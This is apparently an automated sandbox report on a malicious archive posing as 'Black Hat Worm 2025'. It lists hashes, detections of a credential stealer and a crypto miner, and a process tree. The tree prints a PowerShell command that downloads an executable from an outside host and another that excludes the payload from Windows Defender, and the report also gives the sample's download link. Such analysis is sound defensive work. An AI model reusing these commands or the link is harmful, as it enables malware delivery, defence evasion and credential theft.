URL:

https://www.mediafire.com/file/qslvw7hg7v7k41d/Black+Hat+Worm+2025.zip/file

Full analysis: https://app.any.run/tasks/b51b5b6e-bc5c-4de7-a13d-3b904e230fa9
Verdict: Malicious activity
Threats:

Blank Grabber is an infostealer written in Python. It is designed to steal a wide array of data, such as browser login credentials, crypto wallets, Telegram sessions, and Discord tokens. It is an open-source malware, with its code available on GitHub and regularly receiving updates. Blank Grabber builder’s simple interface lets threat actors even with basic skills to deploy it and conduct attacks.

Malware Trends Tracker     >>>
Analysis date: April 20, 2025, 05:31:38
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-exec
evasion
github
miner
uac
blankgrabber
stealer
xmrig
winring0x64-sys
vuln-driver
crypto-regex
screenshot
python
telegram
Indicators:
MD5:

4EC99A51D65FA27684CFD0479879831A

SHA1:

14A3FAC04B75E8C3657F8CDBAE63D79BD7DC5795

SHA256:

5953BC5CDE7CB64D0FC5DD2340D6CA91277E67B2BECD15787BF7BA817F4D64CB

SSDEEP:

3:N8DSLw3eGUoPQSQeRU8MCEvAtKx:2OLw3eGsSxydH+o

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Create files in the Startup directory

      • sass.exe (PID: 976)
      • conhost.exe (PID: 5556)
      • Built.exe (PID: 7244)
      • Fllqzs.exe (PID: 8472)

    • Bypass User Account Control (Modify registry)

      • update.exe (PID: 5780)

    • Bypass User Account Control (ComputerDefaults)

      • ComputerDefaults.exe (PID: 5176)

    • Executing a file with an untrusted certificate

      • Built.exe (PID: 5064)
      • Built.exe (PID: 7244)

    • Vulnerable driver has been detected

      • InstallUtil.exe (PID: 3156)

    • XMRig has been detected

      • OmegaEngine.exe (PID: 7204)

    • BlankGrabber has been detected

      • Built.exe (PID: 5064)

    • MINER has been detected (SURICATA)

      • svchost.exe (PID: 2196)
      • OmegaEngine.exe (PID: 7204)

    • Antivirus name has been found in the command line (generic signature)

      • cmd.exe (PID: 4220)

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 1804)
      • Built.exe (PID: 7244)
      • cmd.exe (PID: 7516)

    • Changes Windows Defender settings

      • cmd.exe (PID: 1804)
      • cmd.exe (PID: 4220)
      • cmd.exe (PID: 7516)

    • Connects to the CnC server

      • OmegaEngine.exe (PID: 7204)

    • Changes settings for real-time protection

      • powershell.exe (PID: 7280)

    • Changes Controlled Folder Access settings

      • powershell.exe (PID: 7280)

    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 7280)

    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 7280)

    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 7280)

    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 7280)

    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 7280)

    • Actions looks like stealing of personal data

      • Built.exe (PID: 7244)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7196)

    • Steals credentials from Web Browsers

      • Built.exe (PID: 7244)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 7600)

    • Changes the autorun value in the registry

      • update.exe (PID: 5780)
      • conhost.exe (PID: 1764)
      • Fllqzs.exe (PID: 8472)
      • reg.exe (PID: 8972)

  • SUSPICIOUS

    • Reads Internet Explorer settings

      • Black Hat Worm 2025.exe (PID: 7376)

    • The process creates files with name similar to system file names

      • Black Hat Worm 2025.exe (PID: 7376)
      • powershell.exe (PID: 5304)
      • crack.exe (PID: 720)
      • conhost.exe (PID: 5556)

    • Reads Microsoft Outlook installation path

      • Black Hat Worm 2025.exe (PID: 7376)

    • Executable content was dropped or overwritten

      • Black Hat Worm 2025.exe (PID: 7376)
      • sass.exe (PID: 976)
      • powershell.exe (PID: 1660)
      • powershell.exe (PID: 5304)
      • powershell.exe (PID: 856)
      • svchost.exe (PID: 4172)
      • crack.exe (PID: 720)
      • conhost.exe (PID: 5556)
      • Built.exe (PID: 5064)
      • conhost.exe (PID: 7716)
      • InstallUtil.exe (PID: 3156)
      • Built.exe (PID: 7244)
      • update.exe (PID: 5780)
      • csc.exe (PID: 9072)
      • conhost.exe (PID: 1764)
      • Black Hat Worm crack.exe (PID: 5044)

    • There is functionality for taking screenshot (YARA)

      • Black Hat Worm 2025.exe (PID: 7376)

    • Reads security settings of Internet Explorer

      • Black Hat Worm 2025.exe (PID: 7376)
      • crack.exe (PID: 720)
      • InstallUtil.exe (PID: 3156)
      • svchost.exe (PID: 4172)
      • Black Hat Worm crack.exe (PID: 5044)
      • Fllqzs.exe (PID: 8472)
      • Update.exe (PID: 6760)

    • The process executes VB scripts

      • Black Hat Worm 2025.exe (PID: 7376)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 5548)
      • wscript.exe (PID: 7012)
      • wscript.exe (PID: 2984)
      • wscript.exe (PID: 5956)
      • update.exe (PID: 5780)
      • Built.exe (PID: 7244)
      • Update.exe (PID: 6760)

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 5548)
      • wscript.exe (PID: 7012)
      • wscript.exe (PID: 2984)
      • wscript.exe (PID: 5956)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2984)
      • wscript.exe (PID: 5956)
      • wscript.exe (PID: 7012)
      • wscript.exe (PID: 5548)

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 1660)
      • powershell.exe (PID: 5304)
      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 856)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 8076)
      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 8112)
      • cmd.exe (PID: 6560)
      • cmd.exe (PID: 1804)
      • cmd.exe (PID: 4220)
      • cmd.exe (PID: 7516)
      • cmd.exe (PID: 7472)
      • cmd.exe (PID: 7600)

    • The executable file from the user directory is run by the CMD process

      • clip.exe (PID: 2092)
      • svchost.exe (PID: 3240)
      • update.exe (PID: 5780)

    • Checks for external IP

      • svchost.exe (PID: 3240)
      • svchost.exe (PID: 4172)
      • svchost.exe (PID: 2196)
      • svchost.exe (PID: 7848)
      • Update.exe (PID: 6760)
      • conhost.exe (PID: 1764)

    • Executes application which crashes

      • svchost.exe (PID: 3240)
      • svchost.exe (PID: 7848)

    • Changes default file association

      • update.exe (PID: 5780)

    • Malware-specific behavior: drops SQLite library (may be used to steal credentials)

      • svchost.exe (PID: 4172)

    • Process drops legitimate windows executable

      • crack.exe (PID: 720)
      • conhost.exe (PID: 7716)
      • InstallUtil.exe (PID: 3156)
      • Built.exe (PID: 5064)
      • Built.exe (PID: 7244)

    • Starts a Microsoft application from unusual location

      • Built.exe (PID: 5064)
      • Built.exe (PID: 7244)

    • The process drops C-runtime libraries

      • Built.exe (PID: 5064)
      • conhost.exe (PID: 7716)

    • Process drops python dynamic module

      • Built.exe (PID: 5064)
      • conhost.exe (PID: 7716)

    • Drops a system driver (possible attempt to evade defenses)

      • InstallUtil.exe (PID: 3156)

    • Application launched itself

      • Built.exe (PID: 5064)
      • conhost.exe (PID: 7716)

    • Crypto Currency Mining Activity Detected

      • svchost.exe (PID: 2196)

    • Found regular expressions for crypto-addresses (YARA)

      • sass.exe (PID: 976)

    • Found strings related to reading or modifying Windows Defender settings

      • Built.exe (PID: 7244)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 1804)
      • cmd.exe (PID: 7516)

    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 4220)

    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 4220)

    • Get information on the list of running processes

      • cmd.exe (PID: 7228)
      • cmd.exe (PID: 7184)
      • cmd.exe (PID: 6656)
      • Built.exe (PID: 7244)

    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 7460)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 7600)

    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 7600)

    • Starts application with an unusual extension

      • cmd.exe (PID: 5952)
      • cmd.exe (PID: 8812)
      • cmd.exe (PID: 1072)
      • cmd.exe (PID: 8500)
      • cmd.exe (PID: 9008)
      • cmd.exe (PID: 9188)

    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 5216)

    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 6044)

    • Accesses antivirus product name via WMI (SCRIPT)

      • WMIC.exe (PID: 5960)

    • Uses ATTRIB.EXE to modify file attributes

      • update.exe (PID: 5780)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 7600)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 9072)

    • Captures screenshot (POWERSHELL)

      • powershell.exe (PID: 7196)

    • Reads the date of Windows installation

      • svchost.exe (PID: 4172)
      • Black Hat Worm crack.exe (PID: 5044)
      • Update.exe (PID: 6760)

    • Starts itself from another location

      • svchost.exe (PID: 4172)

    • Loads Python modules

      • conhost.exe (PID: 1764)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 8840)
      • cmd.exe (PID: 2288)

    • Potential Corporate Privacy Violation

      • OmegaEngine.exe (PID: 7204)

  • INFO

    • Manual execution by a user

      • Black Hat Worm 2025.exe (PID: 7376)
      • WinRAR.exe (PID: 1180)
      • InstallUtil.exe (PID: 3156)
      • Black Hat Worm crack.exe (PID: 5044)

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 1180)

    • Reads the computer name

      • Black Hat Worm 2025.exe (PID: 7376)
      • sass.exe (PID: 976)
      • clip.exe (PID: 2092)
      • svchost.exe (PID: 3240)
      • conhost.exe (PID: 5556)
      • svchost.exe (PID: 4172)
      • update.exe (PID: 5780)
      • crack.exe (PID: 720)
      • svchost.exe (PID: 7848)
      • conhost.exe (PID: 7716)
      • Built.exe (PID: 5064)
      • InstallUtil.exe (PID: 3156)
      • update.exe (PID: 5548)
      • OmegaEngine.exe (PID: 7204)
      • Built.exe (PID: 7244)
      • Update.exe (PID: 6760)
      • conhost.exe (PID: 1764)
      • Black Hat Worm crack.exe (PID: 5044)
      • Fllqzs.exe (PID: 8472)
      • Zubprpbdq.exe (PID: 7084)

    • Application launched itself

      • firefox.exe (PID: 5024)
      • firefox.exe (PID: 5116)
      • chrome.exe (PID: 6964)

    • Checks proxy server information

      • Black Hat Worm 2025.exe (PID: 7376)
      • powershell.exe (PID: 1660)
      • powershell.exe (PID: 5304)
      • powershell.exe (PID: 856)
      • powershell.exe (PID: 6512)
      • svchost.exe (PID: 3240)
      • svchost.exe (PID: 4172)
      • svchost.exe (PID: 7848)
      • slui.exe (PID: 8164)
      • Update.exe (PID: 6760)
      • update.exe (PID: 5780)

    • Checks supported languages

      • Black Hat Worm 2025.exe (PID: 7376)
      • sass.exe (PID: 976)
      • clip.exe (PID: 2092)
      • svchost.exe (PID: 3240)
      • update.exe (PID: 5780)
      • svchost.exe (PID: 4172)
      • conhost.exe (PID: 5556)
      • crack.exe (PID: 720)
      • svchost.exe (PID: 7848)
      • Built.exe (PID: 5064)
      • conhost.exe (PID: 7716)
      • InstallUtil.exe (PID: 3156)
      • update.exe (PID: 5548)
      • OmegaEngine.exe (PID: 7204)
      • Built.exe (PID: 7244)
      • tree.com (PID: 6468)
      • tree.com (PID: 8324)
      • tree.com (PID: 8636)
      • tree.com (PID: 8948)
      • tree.com (PID: 9128)
      • csc.exe (PID: 9072)
      • cvtres.exe (PID: 7144)
      • conhost.exe (PID: 1764)
      • Update.exe (PID: 6760)
      • tree.com (PID: 8140)
      • Black Hat Worm crack.exe (PID: 5044)
      • Zubprpbdq.exe (PID: 7084)
      • Fllqzs.exe (PID: 8472)

    • Process checks computer location settings

      • Black Hat Worm 2025.exe (PID: 7376)
      • crack.exe (PID: 720)
      • InstallUtil.exe (PID: 3156)
      • svchost.exe (PID: 4172)
      • Black Hat Worm crack.exe (PID: 5044)
      • Update.exe (PID: 6760)

    • Creates files or folders in the user directory

      • sass.exe (PID: 976)
      • WerFault.exe (PID: 7676)
      • conhost.exe (PID: 5556)
      • InstallUtil.exe (PID: 3156)
      • WerFault.exe (PID: 4892)
      • update.exe (PID: 5780)
      • svchost.exe (PID: 4172)
      • conhost.exe (PID: 1764)
      • Fllqzs.exe (PID: 8472)

    • Reads the machine GUID from the registry

      • sass.exe (PID: 976)
      • svchost.exe (PID: 3240)
      • svchost.exe (PID: 4172)
      • conhost.exe (PID: 5556)
      • svchost.exe (PID: 7848)
      • csc.exe (PID: 9072)
      • Update.exe (PID: 6760)
      • Black Hat Worm crack.exe (PID: 5044)
      • Fllqzs.exe (PID: 8472)
      • Zubprpbdq.exe (PID: 7084)

    • Disables trace logs

      • powershell.exe (PID: 6512)
      • powershell.exe (PID: 1660)
      • powershell.exe (PID: 5304)
      • powershell.exe (PID: 856)
      • svchost.exe (PID: 3240)
      • svchost.exe (PID: 4172)
      • svchost.exe (PID: 7848)
      • Update.exe (PID: 6760)

    • Reads the software policy settings

      • svchost.exe (PID: 3240)
      • svchost.exe (PID: 7848)
      • svchost.exe (PID: 4172)
      • slui.exe (PID: 8164)
      • Update.exe (PID: 6760)

    • Create files in a temporary directory

      • svchost.exe (PID: 4172)
      • crack.exe (PID: 720)
      • conhost.exe (PID: 7716)
      • Built.exe (PID: 5064)
      • Built.exe (PID: 7244)
      • csc.exe (PID: 9072)
      • cvtres.exe (PID: 7144)
      • Black Hat Worm crack.exe (PID: 5044)
      • update.exe (PID: 5780)

    • The sample compiled with english language support

      • svchost.exe (PID: 4172)
      • conhost.exe (PID: 7716)
      • Built.exe (PID: 5064)
      • InstallUtil.exe (PID: 3156)

    • Reads Environment values

      • svchost.exe (PID: 4172)
      • Update.exe (PID: 6760)

    • Reads security settings of Internet Explorer

      • ComputerDefaults.exe (PID: 5176)
      • WMIC.exe (PID: 5960)

    • The sample compiled with japanese language support

      • InstallUtil.exe (PID: 3156)

    • Creates files in the program directory

      • Built.exe (PID: 7244)

    • The Powershell gets current clipboard

      • powershell.exe (PID: 5204)

    • Checks the directory tree

      • tree.com (PID: 6468)
      • tree.com (PID: 8636)
      • tree.com (PID: 8324)
      • tree.com (PID: 8948)
      • tree.com (PID: 9128)
      • tree.com (PID: 8140)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 812)
      • powershell.exe (PID: 7636)
      • powershell.exe (PID: 7280)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7636)
      • powershell.exe (PID: 7280)
      • powershell.exe (PID: 812)

    • Attempting to use instant messaging service

      • svchost.exe (PID: 2196)

    • Displays MAC addresses of computer network adapters

      • getmac.exe (PID: 8228)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
277
Monitored processes
137
Malicious processes
25
Suspicious processes
11

Behavior graph

Click at the process to see the details
start firefox.exe no specs firefox.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs sppextcomobj.exe no specs firefox.exe no specs #MINER svchost.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs rundll32.exe no specs winrar.exe black hat worm 2025.exe slui.exe wscript.exe no specs wscript.exe no specs wscript.exe no specs wscript.exe no specs sass.exe crack.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe powershell.exe powershell.exe powershell.exe clip.exe no specs svchost.exe werfault.exe no specs crack.exe update.exe svchost.exe conhost.exe cmd.exe no specs conhost.exe no specs computerdefaults.exe no specs computerdefaults.exe no specs computerdefaults.exe #BLANKGRABBER built.exe conhost.exe svchost.exe THREAT installutil.exe werfault.exe no specs update.exe no specs #MINER omegaengine.exe conhost.exe no specs built.exe cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs tasklist.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs tasklist.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs powershell.exe no specs tree.com no specs netsh.exe no specs systeminfo.exe no specs tasklist.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs attrib.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs tree.com no specs tiworker.exe no specs cmd.exe no specs conhost.exe no specs tree.com no specs cmd.exe no specs conhost.exe no specs csc.exe tree.com no specs cmd.exe no specs conhost.exe no specs cvtres.exe no specs tree.com no specs update.exe conhost.exe black hat worm crack.exe fllqzs.exe zubprpbdq.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs getmac.exe no specs reg.exe reg.exe no specs chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
632\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
720"C:\Users\admin\Desktop\Black Hat Worm 2025\Black Hat Worm 2025\crack.exe" C:\Users\admin\Desktop\Black Hat Worm 2025\Black Hat Worm 2025\crack.exe
Black Hat Worm 2025.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\desktop\black hat worm 2025\black hat worm 2025\crack.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
812powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\admin\AppData\Local\Temp\Built.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
856powershell -Command "Invoke-WebRequest -Uri 'https://blackhatusa.com/update.exe' -OutFile 'C:\Users\admin\AppData\Local\Temp\update.exe' -UseBasicParsing"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
976"C:\Users\admin\Desktop\Black Hat Worm 2025\Black Hat Worm 2025\sass.exe" C:\Users\admin\Desktop\Black Hat Worm 2025\Black Hat Worm 2025\sass.exe
Black Hat Worm 2025.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\desktop\black hat worm 2025\black hat worm 2025\sass.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
1072C:\WINDOWS\system32\cmd.exe /c "tree /A /F"C:\Windows\System32\cmd.exeBuilt.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
1088\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1180"C:\Program Files\WinRAR\WinRAR.exe" x -iext -ow -ver -- "C:\Users\admin\Desktop\Black Hat Worm 2025.zip" "?\"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1272tasklist /FO LISTC:\Windows\System32\tasklist.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Lists the current running tasks
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\tasklist.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1328\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeOmegaEngine.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
94 988
Read events
94 859
Write events
109
Delete events
20

Modification events

(PID) Process:(5116) firefox.exeKey:HKEY_CURRENT_USER\SOFTWARE\Mozilla\Firefox\DllPrefetchExperiment
Operation:writeName:C:\Program Files\Mozilla Firefox\firefox.exe
Value:
0
(PID) Process:(1180) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:15
Value:
(PID) Process:(1180) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:14
Value:
(PID) Process:(1180) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:13
Value:
(PID) Process:(1180) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:12
Value:
(PID) Process:(1180) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:11
Value:
(PID) Process:(1180) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:10
Value:
(PID) Process:(1180) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:9
Value:
(PID) Process:(1180) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:8
Value:
(PID) Process:(1180) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:7
Value:
Executable files
140
Suspicious files
209
Text files
1 270
Unknown types
0

Dropped files

PID
Process
Filename
Type
5116firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\9kie7cg6.default-release\startupCache\scriptCache-current.bin
MD5:
SHA256:
5116firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\9kie7cg6.default-release\startupCache\urlCache-current.binbinary
MD5:297E88D7CEB26E549254EC875649F4EB
SHA256:8B75D4FB1845BAA06122888D11F6B65E6A36B140C54A72CC13DF390FD7C95702
5116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\sessionCheckpoints.jsonbinary
MD5:EA8B62857DFDBD3D0BE7D7E4A954EC9A
SHA256:792955295AE9C382986222C6731C5870BD0E921E7F7E34CC4615F5CD67F225DA
5116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\prefs-1.jstext
MD5:2C99A16AED3906D92FFE3EF1808E2753
SHA256:08412578CC3BB4922388F8FF8C23962F616B69A1588DA720ADE429129C73C452
5116firefox.exeC:\Users\admin\AppData\Local\Mozilla\Firefox\Profiles\9kie7cg6.default-release\startupCache\scriptCache-child-current.binbinary
MD5:C95DDC2B1A525D1A243E4C294DA2F326
SHA256:3A5919E086BFB31E36110CF636D2D5109EB51F2C410B107F126126AB25D67363
5116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
MD5:
SHA256:
5116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmbinary
MD5:B7C14EC6110FA820CA6B65F5AEC85911
SHA256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
5116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\AlternateServices.binbinary
MD5:6125E35DD50C5EC21054ED328730A9D5
SHA256:D1D8BF89717918E9D09972787DC3B8BC903170A60C2C187EB5CC636DE93851B1
5116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\protections.sqlite-journalbinary
MD5:43EA52AAF682673CDA8B1A42996107A6
SHA256:5E1964D9C1FB0CCF266DBEC6E026B03F96D51E34F7B21CEE23916BF4F582F918
5116firefox.exeC:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\9kie7cg6.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmbinary
MD5:B7C14EC6110FA820CA6B65F5AEC85911
SHA256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
93
TCP/UDP connections
294
DNS requests
332
Threats
27

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5116
firefox.exe
POST
142.250.184.195:80
http://o.pki.goog/s/we1/vLA
unknown
whitelisted
POST
200
142.250.184.195:80
http://o.pki.goog/we2
unknown
whitelisted
5116
firefox.exe
POST
200
142.250.184.195:80
http://o.pki.goog/we2
unknown
whitelisted
POST
200
142.250.184.195:80
http://o.pki.goog/we2
unknown
whitelisted
POST
200
2.16.241.15:80
